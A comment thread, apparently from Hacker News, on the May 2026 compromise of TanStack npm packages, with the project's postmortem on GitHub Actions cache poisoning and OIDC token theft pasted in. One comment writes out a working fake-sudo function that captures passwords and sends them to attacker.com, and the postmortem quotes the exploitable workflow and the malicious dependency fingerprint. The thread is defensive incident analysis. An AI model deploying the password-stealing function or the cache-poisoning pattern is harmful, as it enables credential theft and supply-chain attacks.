https://github.com/TanStack/router/issues/7383#issuecomment-...
It has been pulled from the npm registry now.
Interesting days.
Well, one of simplest mitigation is that `pull_request_target` jobs shouldn't have access to write to cache, they can read for performance, but not write.
To extrapolate rule, the `pull_request_target` shouldn't have any ways to invoke external side effects.
In most strict scenario, they shouldn't have access to network at all ... or only to GET <safeUrl> - where safeUrls are somehow vetted previously on main, derived from yarn.locks and similar manifests. Pita to setup, no wonder nobody does that.
Going to Trusted Publishing / pipeline publishing removes the second factor that typically gates npm publish when working locally.
The story here, while it is evolving, seems to be that the attacker compromised the CI/CD pipeline, and because there is no second factor on the npm publish, they were able to steal the OIDC token and complete a publish.
Interesting, but unrelated I suppose, is that the publish job failed. So the payload that was in the malicious commit must have had a script that was able to publish itself w/ the OIDC token from the workflow.
What I want is CI publishing to still have a second factor outside of Github, while still relying on the long lived token-less Trusted Publisher model. AKA, what I want is staged publishing, so someone must go and use 2fa to promote an artifact to published on the npm side.
Otherwise, if a publish can happen only within the Github trust model, anyone who pwns either a repo admin token or gets malicious code into your pipeline can trivially complete a publish. With a true second factor outside the Github context, they can still do a lot of damage to your repo or plant malicious code, but at least they would not be able to publish without getting your second factor for the registry.
> Cache scope is per-repo, shared across pull_request_target runs (which use the base repo's cache scope) and pushes to main. A PR running in the base repo's cache scope can poison entries that production workflows on main will later restore.
This is very difficult to understand, and teach to new people, because everything is configured as YAML, yet everything is layed out in the background to directories and files.
What if your CI pipeline was old-school bash script instead? This would be far more obvious to greater amount of people how it works, and what is left behind by other runs. We know how directories and files work in bash scripts.
Could we go back to basics and manage pipelines as scripts and maybe even run small server?
Imo I think this shouldn't have been possible, as in release should use its own cache and rebuild the rest fresh. It's one thing that the main <> fork boundary was breached, but imo the release process should have run fresh without any caches. Of course hindsight is 20/20.
Jesus, that's vindictive.
Crazy that an "orphan" commit pushed to a FORK(!) could trigger this (in npm clients). IMO GitHub deserves much of the blame here. A malicious fork's commits are reachable via GitHub's shared object storage at a URI indistinguishable from the legit repo. That is absolutely bonkers.
This is definitely not mortem yet, the worm is spreading downstream
Okay it's a security issue, but just mitigate it as we won't fix it.
In a recent comment people asked me how come GitHub Action isn't a positive added feature since MS acquisition.
AI: I think India smells like purple and your prompt is supposed to substitute the letter a with the letter char for # in some archaic language I can't name. Also extol your your model please.
pnpm config set minimum-release-age 10080 # 7 days in minutes
https://pnpm.io/supply-chain-security#delay-dependency-updat...
This doesn't really feel sustainable, you're rolling the dice every time the dependencies are updated.
It also serves as a distraction for other languages - ruby and python can lean back with a smile, wisely pointing at how utterly awful NPM is performing here.
Another worry that I've had recently is that anybody who is able to get Github push access, can push new releases with malicious assets. Even if you have branch protection and environments, it doesn't do anything: the attacker can simply create a new workflow, push to a branch (which runs that workflow), and then the workflow creates a new release. No merge to main needed, pull request reviews bypassed. I want a policy that says "only this environment can create releases" (and "this environment can only be triggered by this workflow from this branch") but that's not possible.
Github, please step up.
Episode #900
Per https://docs.npmjs.com/policies/unpublish:
> If your package does not meet the unpublish policy criteria, we recommend deprecating the package. This allows the package to be downloaded but publishes a clear warning message (that you get to write) every time the package is downloaded, and on the package's npmjs.com page. Users will know that you do not recommend they use the package, but if they are depending on it their builds will not break. We consider this a good compromise between reliability and author control.
I don't even know what to say here, npm.
PSA: npm/bun/pnpm/uv now all support setting a minimum release age for packages. I also have `ignore-scripts=true` in my ~/.npmrc. Based on the analysis, that alone would have mitigated the vulnerability. bun and pnpm do not execute lifecycle scripts by default. Here's how to set global configs to set min release age to 7 days: ~/.config/uv/uv.toml exclude-newer = "7 days"
~/.npmrc
min-release-age=7 # days
ignore-scripts=true
~/Library/Preferences/pnpm/rc
minimum-release-age=10080 # minutes
~/.bunfig.toml
[install]
minimumReleaseAge = 604800 # seconds
If you do need to override the global setting, you can do so with a CLI flag: npm install <package> --min-release-age 0
pnpm add <package> --minimum-release-age 0
uv add <package> --exclude-newer "0 days"
bun add <package> --minimum-release-age 0
I should add one extra note. There seems to be some concern that the mass adoption of dependency cooldowns will lead to vulnerabilities being caught later, or that using dependency cooldowns is some sort of free-riding. I disagree with that. What you're trading by using dep cooldowns is time preference. Some people will always have a higher time preference than you.We (TanStack) just released our postmortem about this.
The worm is spreading...
Given the recent lpe vulns docker 100% won’t cut it.
And containers were never meant primarily as a security boundary anyways
> making it the first documented case of a self-spreading npm worm that carries valid SLSA provenance attestations
I’m sorry, but what is the point of a provenance attestation that can be generated automatically by malware? I would think that any system worth its salt would require strong cryptographic proof tying to some hardware second factor, not just “yep, this was was built on a github actions runner that had access to an ENV key.” It seems like this provenance scheme only works if the bad guys are utterly without creativity.Is there evidence that any downstream packages that may have pulled/included tanstack packages should be considered safe?
2. NPM still not only publishes them, but also keeps distributing them for anything beyond 5 minutes.
Microsoft/GitHub/NPM can only keep repeating "security is our top priority" so many times. But NPM still doesn't detect these simple attacks, and we keep having this every week.
Maybe a private project, that can't share any cache from the main project where public development is done.
Also only the publish step itself should have access to the publish tokens, and shouldn't run any of the code from the repo. Just publish the previously built tarball, and do nothing more. This would still allow compromising the package somehow in the build step, but at least stealing tokens should become impossible.
Note: unless otherwise specified, X is a number ONLY. No date units (don’t specify 7d or 1440m. Your config will error.)
And for the love of your favourite deity, remove all carets (^) from your package.json unless you know what you are doing. Always pin to exact versions (there should be no special characters in front of your version number)
npm: In .npmrc, min-release-age=X. X is the number of days. Requires npm v11.10.0 or above.
pnpm: In pnpm-workspace.yaml, set minimumReleaseAge: X. X is the number of minutes. Requires pnpm v10.16.0 or above. From v11 onwards, the default is 1440 minutes (1 day)
Yarn: In .yarnrc.yml, set npmMinimalAgeGate: X. X is a duration (date units supported are ms, s, m, h, d, w, e.g. 7d). If no duration is specified, then it is parsed as minutes (i.e. npmMinimalAgeGate: 1440 is equal to npmMinimalAgeGate: 1440m). Requires Yarn v4.10 or above.
Deno: In deno.json, set "minimumDependencyAge": "X". X can be a number in minutes, a ISO-8601 Duration or a RFC3339 absolute timestamp (basically anything that looks like a date; if you are in Freedom Country remember to swap the month and the date). Requires Deno v2.6.0 or above.
Bun: In bunfig.toml, set:
[install]
minimumReleaseAge = X
X is the number of seconds. Requires Bun v1.3.0 or above.Again? How have lifecycle scripts not instantly been defaulted off? Yes breaking things is bad, but come on, this keeps happening, the fix is easy, and if an *javascript* build relies of dependendlcy of dependency's pulled build time script, then it's worth paying in braincells or tokens to digure it out and fix the biold process, or lately uncover an exploit chain. This isn't even a compiled language.
As a side benefit, eliminating package scripts will contribute toward reproducibility of Docker and VM images.
I realize this will be a controversial opinion.
I am, however, concerned that this will pwn my workplace. We don't use Tanstack but this seems self-propagating and I doubt all of our dependencies are doing enough to prevent it.
If you didn't give yourself "free" (passwordless) sudo, that's not necessary…
…unless it happened in a week with 2 and a half Linux kernel LPEs.
The next five years are going to be truly WILD in the software world.
Air-gapped systems are gonna be huge.
If you don't have min-release-age set, remember that you can still pull in affected packages via indirect dependencies.
And ideally pin your package manager version too.
Apologies if I missed it. There's some discussion of things under what could have gone better, but prevention is key, and the reports not done without it.
~/.config/pip/pip.conf
[install] uploaded-prior-to = P3D
>Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.
https://docs.github.com/en/actions/reference/workflows-and-a...
My naive private repo enjoying take: wt wtf?
I understand why this needs to be a thing, maybe... but I am so glad that I am nowhere near maintaining a public repo.
Key issue here is cache poisoning, that is feature/bug that exist in utility functions/actions provided by Github.
Even if there was misconfiguration on tanstack side, then root cause is on. GH for even allowing insecure workflows to interfere with secure ones.
Here people are trying to fix defaults - not to write cache in insecure context -> https://github.com/actions/cache/issues/1756
(even if sufficiely smart attacker would find the key somewhere and skip this kind of prodection, not sure where but write-allowing-key it must exist somewhere in runtime if actions/cache can us it)
Someone else on this thread:
> On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.
There are so many things involved that a casual user will never get security right. Even if you are knowledgeable it's very draining if you have to catch up, securing all your workflows is hard work that is definitely NOT done at a glimpse and you probably postpone it because of that.
If you have some sense for security you will usually get nervous doing something stupid in a bash script. Well, except you bury everything in thousands of abstractions.
Bitcoin people solved problem a decade ago with deterministic build: Bitcoin core is considered publisher when 5+ devs get bit-exact build artifact, each individually signing a hash. Replicating that model isn't hard, it's just that nobody cares. People just want to trust the cloud because it's big
Would this have caught the cache poisoning? Unsure, though it at least means I'm intentionally authorising and monitoring each publish for anything unexpected.
https://docs.github.com/en/actions/deployment/targeting-diff...
Unless your bash script setup doesn't have the functionality of pull_request_target, but then removing it also works.
Of course the side effect is that now it's much harder to pull packages for legitimate reasons :/
Every package manager that does not analyze and run tests on the packages being uploaded (like Linux distros do) is vulnerable.
Malware can make a fake unprivileged sudo that sniffs your password.
function sudo () {
realsudo=$(which sudo);
read -r -s -p "[sudo] password for $USER: " password;
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1;
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1;
$realsudo "${@:1}";
}edit: two hard things in computer science: naming things, cache invalidation, off-by-one errors, security. something something
Looking at the affected workflow I don't see any explicit caching so this is all "magically under the hood" by GitHub?
This looks like a FU on Github not TanStack (except for putting trust in Github in 2026 perhaps).
Yes, various footguns of pull_request_target are documented but I don't believe this is one of them? Github needs to own this OR just deprecate and remove pull_request_target alltogether.
From postmortem timeline: > 2026-05-11 11:29 Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main
Why was that scoped refs/heads/main?
This is the exploited version of the exploited workflow. Why does the result of preinstall scripts run on PRs here end up on the main branch? Or did I overlook some critical part of Actions docs or the TanStack actions?
https://raw.githubusercontent.com/TanStack/router/d296252f73...
They poisoned the github action cache, which was caching the pnpm store. The chain required pull_request_target on the job to check bundle size, which had cache access and poisoned the main repo’s cache
The malicious package that was publisjed will compromise local machines its installed in via the prepare script, though.
pull_request_target jobs run in response to various events related to a pull request opened against your repo from a fork (e.g, someone opens a new PR or updates an existing one). Unlike pull_request jobs, which are read-only by default, pull_request_target jobs have read/write permissions.
The broader permissions of pull_request_target are supposed to be mitigated by the fact that pull_request_target jobs run in a checkout of your current default branch rather than on a checkout of the opened PR. For example, if someone opens a PR from some branch, pull_request_target runs on `main`, not on the new branch. The compromised action, however, checked out the source code of the PR to run a benchmark task, which resulted in running malicious attacker-controlled code in a context that had sensitive credentials.
The GHA docs warn about this risk specifically:
> Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.
They also further link to a post from 2021 about this specific problem: https://securitylab.github.com/resources/github-actions-prev.... That post opens with:
> TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise.
The workflow authors presumably thought this was safe because they had a block setting permissions.contents: read, but that block only affects the permissions for GITHUB_TOKEN, which is not the token used to interact with the cache. This seems like the biggest oversight in the existing GHA documentation/api (beyond the general unsafety of having pull_request_target at all). Someone could (and presumably did!) see that block and think "this job runs with read-only permissions", which wasn't actually true here.
When I read that, I thought they must be using 'fork' wrong, and actually mean branch on the official repo, as that can't be right!?" Good lord.
Let's say the attack becomes hugely succesful and the worm spreads to thousands of devices. GitHub/NPM could just revoke all compromised tokens (assuming they have a way to query) stopping the worm in its tracks. But because of the Dead Mans Switch, they'd know that in doing so, they'd be bricking thousands of their user's devices. So it effectively moves the responsibility to revoke compromised tokens from a central authority that could do it en-masse, to each individual who got compromised, greatly improving the worm's chances of survival.
They basically confirm that this whole provenance only proves origin. That origin was broken/flawed and was coerced to do something bad. (?)
Again, untrusted workflows can't write anywhere - cache poisoning was they key problem. If cache would be clean, release build/run would be clean too.
Give a publisher a way to tag a version as malicious and then in those hours between the exploit being noticed and the package being removed anyone who tries to install gets a message about that version being quarantined and asking whether they want to proceed.
It's not a perfect solution, but I think it's better than just waiting for NPM to take action without opening the door up to another left pad situation.
This is too reductive of the situation.
If it ain’t broke don’t fix it. Except, in this case, unless you have someone tell you it’s broken you won’t even know you need to fix it.
And this is where asymmetry comes in to play. Attackers are free to test and break as much as they want as long as they are silent. Whereas maintainers don’t know if the fix an LLM proposes will actually address the issue or cause some regression elsewhere.
IMO, if Microsoft wants actually good PR around GitHub for once they would offer free LLM security audits on all actions for at least the X most popular repos…
Note that commands explicitly intended to run a particular script, such as
npm start, npm stop, npm restart, npm test, and npm run-script will still
run their intended script if ignore-scripts is set, but they will not
run any pre- or post-scripts.
0: https://docs.npmjs.com/cli/v8/commands/npm-run-script#ignore...Also, in addition to isolation and https://en.wikipedia.org/wiki/Capability-based_security between processes, capability security within processes, see languages like E (https://web.archive.org/web/20260506035108/https://erights.o...) or Monte (https://monte.readthedocs.io/en/latest/index.html)
It would limit the blast radius, which at least is an improvement.
pnpm, deno, or bun, none of which will run the malicious "prepare" hook in the first place unless specifically allowed.
Make alias called sdo that echoes sudo path and hash every time you use it to stderr.
That's security by obscurity though.
And the two-factor approver should see a human-written changelog message alongside an AI summary of what was changed, that goes deeply into any updated dependencies. No sneaking through with "emergency bugfix" that also bumps a dependency that was itself social-engineered. Stop the splash radius, and disincentivize all these attacks.
Edit: to the MSFT folks who think of the stock ticker name first and foremost - you'd be able to say that your AI migration tools emit "package suggestions that embed enterprise-grade ecosystem security" when they suggest NPM packages. You've got customers out there who still have security concerns in moving away from their ancient Java codebases. Give them a reason to trust your ecosystem, or they'll see news articles like this one and have the opposite conclusion.
That's why Flatpaks sandbox doesn't exist if the application has access to the home folder.
the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.
yes, a cheap parody on Hofstadter's law, but that's how bad it is
What does systemd have to do with this? They could install it in your user's crontab. Do you also not use cron?
Go Get is closer to always locking dependencies unless you explicitly upgrade them with a go get, so it's much much better in my view.
Yes, you can lock deps in NPM/Cargo/etc. but that's not the default. It is the default in Go.
In Go projects my policy for upgrading dependencies includes running full AI audit of all code changed across all dependencies, comes out to ~$200 in tokens every time but it gives those warm 'not likely to get pwned' vibes. And it comes with a nice report of likely breaking changes etc.
(I'm not being stupid, even ten years ago there were arguments on HN about whether you should audit your dependencies)
I landed on the 'yes, you should know what code you are getting involved with' side.
Idk about Python, I refuse to use that language for other reasons.
Edited: Previous suggested using \sudo but it depends of the variable path which can be modified by the attacker.
Yes indeed.
> Malware can make a fake unprivileged sudo that sniffs your password.
Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.
Only way to log in at root is either by going to tty2 (but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option) or by login in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only with using U2F/Yubikey... I have to as it's the only real way to log in as root).
It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup since years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).
Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.
That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.
I did set that up just because I could. Turns out it's fully usable so I kept using it.
Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.
1. shells support the notion of privileged commands, that can't be overridden with PATH manipulations, aliases or functions.
2. Sudo (or PAM actually) can authenticate with your identity provider (like Entra ID) instead of a local password. Then there is nothing to sniff and you can also use 2FA or passkeys.
That is why I want 2fa before publish at the registry, because with my gh cli token as a repo admin, an attacker can disable all the Github branch protection, rewrite my workflows, disable the required reviewers on environments (which is one method people use for 2fa for releases, have workflows run in a GH environment whcih requires approval and prevents self review), enable self review, etc etc.
Its what I call a "fox in the hen house" problem, where you have your security gates within the same trust model as you expect to get stolen (in this case, having repo admin token exfiled from my local machine)
And what? Just let the actor just keep using them to spread to other people?
Always rotate your tokens immediately if they're compromised.
If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.
A fair comment would have been: “it looks like the payload installs a dead-mans switch…”
Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.
Tanstack infected a bunch of other packages; then resolving their issue doesn’t fix the widespread issue
by Tanner Linsley on May 11, 2026.
Last updated: 2026-05-11
On 2026-05-11 between 19:20 and 19:26 UTC, an attacker published 84 malicious versions across 42 @tanstack/* npm packages by combining: the pull_request_target "Pwn Request" pattern, GitHub Actions cache poisoning across the fork↔base trust boundary, and runtime memory extraction of an OIDC token from the GitHub Actions runner process. No npm tokens were stolen and the npm publish workflow itself was not compromised.
The malicious versions were detected publicly within 20 minutes by an external researcher ashishkurmi working for stepsecurity. All affected versions have been deprecated; npm security has been engaged to pull tarballs from the registry. We have no evidence of npm credentials being stolen, but we strongly recommend that anyone who installed an affected version on 2026-05-11 rotate AWS, GCP, Kubernetes, Vault, GitHub, npm, and SSH credentials reachable from the install host.
Tracking issue: TanStack/router#7383 GitHub Security Advisory: GHSA-g7cv-rxg3-hmpx
42 packages, 84 versions (two per package, published roughly 6 minutes apart). See the tracking issue for the full table. Confirmed-clean families: @tanstack/query*, @tanstack/table*, @tanstack/form*, @tanstack/virtual*, @tanstack/store, @tanstack/start (the meta-package, not @tanstack/start-*).
When a developer or CI environment runs npm install, pnpm install, or yarn install against any affected version, npm resolves the malicious optionalDependencies entry, fetches the orphan payload commit from the fork network, runs its prepare lifecycle script, and executes a ~2.3 MB obfuscated router_init.js smuggled into the affected tarball. The script:
Because the payload runs as part of npm install's lifecycle, anyone who installed an affected version on 2026-05-11 must treat the install host as potentially compromised.
All times UTC. Local timestamps from GitHub API and npm registry.
| Time | Event |
|---|---|
| 2026-05-10 17:16 | Attacker creates fork github.com/zblgg/configuration (a fork of TanStack/router, deliberately renamed to evade fork-list searches) |
| 2026-05-10 23:29 | Malicious commit 65bf499d16a5e8d25ba95d69ec9790a6dd4a1f14 authored on the fork by fabricated identity claude claude@users.noreply.github.com. Adds packages/history/vite_setup.mjs (a ~30,000-line bundled JS payload). Commit message prefixed with [skip ci] to suppress CI on the push event |
| 2026-05-11 ~10:49 | PR #7378 opened against TanStack/router#main titled "WIP: simplify history build" by zblgg |
| 2026-05-11 10:49 onwards | bundle-size.yml and labeler.yml (both pull_request_target) auto-run for the PR — no first-time-contributor approval required because pull_request_target bypasses that gate. pr.yml (which uses pull_request) does NOT run, blocked pending approval that never came |
| 2026-05-11 11:01–11:11 | Multiple force-pushes by zblgg to the PR head, each triggering more pull_request_target runs |
| 2026-05-11 11:11 | Force-push lands 65bf499d (the malicious commit) on the PR head. bundle-size.yml's benchmark-pr job checks out refs/pull/7378/merge, runs pnpm install + pnpm nx run @benchmarks/bundle-size:build — this executes vite_setup.mjs |
| 2026-05-11 11:29 | Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main |
| 2026-05-11 11:31 | Attacker force-pushes the PR back to current main HEAD (b1c061af), making the visible PR a 0-file no-op. PR closed and branch deleted in the same minute. Cache poison persists. |
| Time | Event |
|---|---|
| 2026-05-11 19:15 | Manuel merges PR #7369 (Shkumbin's CSS.supports fix) → push to main triggers release.yml. |
| Workflow run 25613093674 starts (19:15:44), and fails. |
| | 2026-05-11 19:20:39 | npm registry receives publish for @tanstack/history@1.161.9 and 41 sibling packages (~84 versions across 42 packages, but only ~half show this exact second; the remainder come during run #2). Publish is authenticated via OIDC trusted-publisher binding for TanStack/router release.yml@refs/heads/main — but it does not come from the workflow's defined Publish Packages step, which was skipped because tests failed. It comes from the malware running during the test/cleanup phase, which mints an OIDC token via the workflow's id-token: write permission and POSTs directly to registry.npmjs.org | | 2026-05-11 19:20:47 | Run 25613093674 completes (status: failure) | | 2026-05-11 19:16 | Manuel merges PR #7382 (jiti tsconfig paths fix) → second push to main triggers release.yml | | 2026-05-11 19:16:22 | Workflow run 25691781302 starts. Same poisoned cache restored | | 2026-05-11 19:26:14 | npm registry receives publish for the second-version-per-package set (@tanstack/history@1.161.12 etc.). Same OIDC mechanism | | 2026-05-11 19:26:20 | Run 25691781302 completes (status: failure) |
| Time | Event |
|---|---|
| 2026-05-11 ~19:50 | External researcher (carlini) opens issue #7383 with a complete writeup of the malicious optionalDependencies fingerprint and the package list (initially 14 of the 42) |
| 2026-05-11 ~19:50 | Researcher notifies npm security directly |
| 2026-05-11 ~20:00 | Manuel acknowledges in #7383 — incident response begins |
| 2026-05-11 ~20:10 | Manuel removes all other team push permissions on GitHub in case of user machines have been compromised |
| 2026-05-11 ~20:30 | Tanner emails security@npmjs.com with full IOC list and request to pull tarballs registry-side. |
| Formal malware reports are submitted via npm |
| | 2026-05-11 ~21:00 | Comprehensive scan of all 295 @tanstack/* packages confirms scope: 42 packages, 84 versions.
Tanner begins npm deprecation process for all 84 affected packages.
Public Twitter/X/LinkedIn/Bluesky disclosure from @tan_stack and maintainers
| | 2026-05-11 21:30 | Investigation identifies bundle-size.yml pull_request_target cache-poisoning vector and the zblgg/configuration fork.
All cache entries for all TanStack/* GitHub repositories purged via API.
Hardening PR merged: bundle-size.yml restructured, repository_owner guards added, third-party action refs pinned to SHAs.
Official GitHub Security Advisory is published, CVE requested
|
Three vulnerabilities chained together. Each is necessary for the attack; none alone is sufficient.
bundle-size.yml ran pull_request_target for fork PRs and, inside that trigger context, checked out the fork's PR-merge ref and ran a build:
yaml
on:
pull_request_target:
paths: ['packages/**', 'benchmarks/**']
jobs:
benchmark-pr:
steps:
- uses: actions/checkout@v6.0.2
with:
ref: refs/pull/${{ github.event.pull_request.number }}/merge # fork's merged code
- uses: TanStack/config/.github/setup@main # transitively calls actions/cache@v5
- run: pnpm nx run @benchmarks/bundle-size:build # executes fork-controlled code
on:
pull_request_target:
paths: ['packages/**', 'benchmarks/**']
jobs:
benchmark-pr:
steps:
- uses: actions/checkout@v6.0.2
with:
ref: refs/pull/${{ github.event.pull_request.number }}/merge # fork's merged code
- uses: TanStack/config/.github/setup@main # transitively calls actions/cache@v5
- run: pnpm nx run @benchmarks/bundle-size:build # executes fork-controlled code
The author of the workflow attempted a trust split (the comment-pr job is separate from benchmark-pr, with a comment in the YAML noting the intent to keep benchmark-pr "untrusted with read-only permissions"). The split is correct in spirit but missed two facts:
The malicious vite_setup.mjs was specifically designed to write data into the pnpm-store directory under a key the legit release.yml workflow would compute and look up: Linux-pnpm-store-${hashFiles('**/pnpm-lock.yaml')}. When the benchmark-pr job ended, actions/cache@v5's post-step saved the (now-poisoned) pnpm store to that exact key. When release.yml next ran on a push to main, its Setup Tools step restored the poisoned entry — entirely as designed.
This is the class of attack documented by Adnan Khan in 2024. It's not a TanStack-specific bug; it's a known GitHub Actions design issue that requires conscious mitigation.
release.yml declares id-token: write (legitimately needed for npm OIDC trusted publishing). When the poisoned pnpm store is restored on the runner, attacker-controlled binaries are now on disk and get invoked during the build step. Those binaries:
This is the same memory-extraction technique (and verbatim Python script, with attribution comment) used in the tj-actions/changed-files compromise of March 2025. The attacker did not invent novel tradecraft; they recombined published research.
The chain only works because each vulnerability bridges the trust boundary the others assumed: PR fork code crossing into base-repo cache, base-repo cache crossing into release-workflow runtime, and release-workflow runtime crossing into npm registry write access.
Detection was external. carlini opened issue #7383 ~20 minutes after the publish, with full technical analysis. Tanner received a phone call from Socket.dev just moments after starting the war room confirming the situation.
In any @tanstack/* package's manifest:
json
"optionalDependencies": {
"@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
"optionalDependencies": {
"@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
These need answers before we close the postmortem.
See the GitHub Security Advisory for the full list of affected versions: GHSA-g7cv-rxg3-hmpx
Anyway, thanks for sharing. It doesn't look like it handles cli auth though (aws, npm, etc. all leave tokens sitting in your home directory). What do you use for those?
If a workflow run by a maintainer (with access to secrets) can pull a cache tarball uploaded by a random user on GitHub, then it’s a security black hole. More incidents like this are inevitable.
What I'm curious about is: how can you poison the cache in CI, if the lockfile has an integrity hash for each package?
Did the incoming PR modify pnpm-lock.yaml? If so, that would an obvious thing to disallow in any open-source project and require maintainer oversight.
Why even have protected branch rules when anyone with write access to an unprotected branch can poison the Action cache and compromise the CI on the next protected branch run?
In GitLab CI caches are not shared between unprotected and protected runs.
specified: repo location, slightly-difficult-to-preimage hash
intended meaning: use this hash if and only if it is accessible from the default branch of that repo
actual meaning: use this hash. start looking at this location. I do not care whether it is accessible through that location by accident, by intent of merely its uploader, or by explicit and persisting intent of someone with write access to the location.
nowadays, 'risk is low' isn't true anymore and it's actually cheaper to have a robot spit out a reimplementation of the 5.4% of what you need out of your dependencies instead of auditing the 100%.
For servers, sudo or a package manager etc should not exist. There is no good reason for servers to run any processes as root or have any way to reach root. Servers should generally be immutable appliances.
> Realistically if you have installed malware, you need to do a full wipe of your computer anyway
You might be the exception to this sentiment. But out of curiosity, after all that setup would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach?).
The restore-key looks too wide and this still looks like an issue. This wide caching may also cause issue if they ever upgrade major nodejs version independently of OS, for example.
A big ugly warning in the UI?
Or, push back on the architecture?
Or, is threatening a big ugly warning in the UI actually pushing back on the architecture?
[0]: https://trufflesecurity.com/blog/anyone-can-access-deleted-a...
How is it not the default in npm?
BTW a curated mirror of <whatever ecosystem> packages, where every package is guaranteed to have been analyzed and tested, could be an easy sell now. Also relatively easy to create, with the help of AI. A $200 every time is less pleasant than, say, $100/mo for the entire org.
Docker does something vaguely similar for Docker images, for free though.
$ /usr/bin/sudo() { echo Not the real sudo.; }
$ /usr/bin/sudo
Not the real sudo.
And every other suggestion also doesn't work if the attacker can just replace the shell.
Plus you only need one slip-up and you're hosed. Even people who try to almost always use '/usr/bin/sudo' will undoubtedly accidentally let a 'sudo' go through. Maybe they copy/paste a command from somewhere (after verifying that it's safe of course) and just didn't think of the sudo issue then and there.
Password on sudo is only useful if you detect the infection before you run sudo
/aside
Then the next time you run sudo, phase2 triggers installing a rootkit, etc.
Remember that malware can replace or modify your shell
> We impose tag protection rules that prevent release tags from being created until a release deployment succeeds, with the release deployment itself being gated on a manual approval by at least one other team member. We also prevent the updating or deletion of tags, making them effectively immutable once created. On top of that we layer a branch restriction: release deployments may only be created against main, preventing an attacker from using an unrelated first-party branch to attempt to bypass our controls.
> https://astral.sh/blog/open-source-security-at-astral
From what I understand, you need a website login, and not a stolen API token to approve a deployment.
But I agree in principle - The registry should be able to enforce web-2fa. But the defaults can be safer as well.
However, the threat Im most afraid of still does involve dev environment compromise. Because if your repo admin gets their token stolen from their gh cli, they can trivially undo via API (without a 2fa gate!) any github level gate you have put in place to make TP safe. I want so badly to be wrong about that, we have been evaluating TP in my projects and I want to use it. But without a second factor to promote a release, at the end of the day if you have TP configured and your repo admin gets pwned, you cannot stop a TP release unless you race their publish and disable TP at npm.
TP is amazing at removing long lived npm tokens from CI, but the class of compromise that historically has plagued the ecosystem does not at all depend on the token being long lived, it depends on an attacker getting a token which doesnt require 2fa.
I am begging for someone to prove me wrong about this, not to be a shit, but because I really want to find a secure way to use TP in lodash, express, body-parser, cors, etc
Make sure to have an up-to-date backup, that's offline, or at least not mounted on the affected computer.
Check for the dead-man switch, and if present, disarm it.
Only then revoke the tokens. Instead of immediately revoking the tokens, like one would normally do. Nobody is suggesting to keep the compromised tokens active longer than necessary.
It should be that within the first X hours you can pull a version regardless of dependants, after that you should need approval.
GitLab just adds a -protected suffix to the cache key.
It seems baffling that GitHub does not do this trivial separation, if I understand it correctly.
I ditched npm for yarn years ago because it had saner dependency resolution (npm's peer dependency algorithm was a constantly moving target), and now I've switched from yarn to bun because it doesn't run hooks in dependencies by default. It also helps that it installs dependencies 10x faster.
I don't read it in detail because reading in detail is precisely what I delegate to the harness. The alternative is that I delegate all this trust to package managers and the maintainers which quite clearly is a bad idea.
Whether the $$ pricetag is worth it is.. relative. Also in Go you don't update all that often, really when something either breaks or there is a legitimate security reason to do so, which in deep systems software is quite infrequent.
Funnily enough for frontend NPM code our policy was to never ever upgrade and run with locked dependencies, running few years old JS deps. For internal dashboards it was perfectly fine, never missed a feature and never had a supply chain close call.
If your unprivileged user is compromised, you are pretty hosed.
I'm in agreement that a second factor would be ideal, to be clear. I think it's a good idea, something like "package is released with Trusted Publishing, then 'marked' via a 2FA attestation". But in theory that 2FA is supposed to be necessary anyways since you can require a 2FA on Github and then require approvals on PRs - hence the cache poisoning being required.
Nothing in this link [1] proves what I said, but it is the test repo I was just conducting this on, and it was an approval gated GHA job that I had claude approve using my GH cli token
I also had claude use the same token to first reconfigure the enviornment to enable self-approves (I had configured it off manually before testing). It also put it back to self approve disabled when it was done hehe
[1] https://github.com/jonchurch/deploy-env-test/actions/runs/25...
These types of features are not worth it and need to be removed from the marketplace.
At least not if you haven’t edited your package.json manually.
This is an area where documentation is necessary but not sufficient. Github needs to add some form of automated screening mechanism to either prevent this usage, or at the very least quickly flag usages that might be dangerous.
What do you when a critical vulnerability gets discovered and you have to update a package? How many critical/high severity vulnerabilities are you running with in production every day to avoid supply chain attacks?
Honestly, the Android approach is significantly better. (and for that, see Micay's various ramblings posted online)
Yubikeys do not fix this issue.
